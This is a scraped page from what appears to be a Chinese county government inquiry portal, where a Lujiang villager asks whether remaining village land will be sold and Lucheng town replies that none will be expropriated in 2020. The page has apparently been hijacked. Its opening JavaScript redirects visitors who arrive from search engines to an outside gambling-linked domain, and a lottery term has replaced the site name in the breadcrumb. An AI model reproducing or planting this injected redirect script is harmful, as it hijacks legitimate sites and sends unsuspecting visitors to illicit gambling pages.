var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 咨询投诉

来信信息
信件编号: 15242610679443
信件类型: 我要咨询
来信标题: 有没有土地卖了
来信时间: 2020-01-02
来信内容:
庐江县,申山村(原长塘村)下堰村民组,2018已经卖了一部分土地了,剩下的土地出租了,我想请问一下,剩下的土地今年有没有要卖的了,
回复内容
答复单位: 庐城镇
办理时间: 2020-01-09
回复内容:

尊敬的来信人:您好!

  经核查,今年没有大建设项目或公益项目涉及到下堰村民组。所以2020年不会征收下堰村民组的土地。

  感谢您对我们工作的理解和支持。


留言评价
查询密码:
评价结果: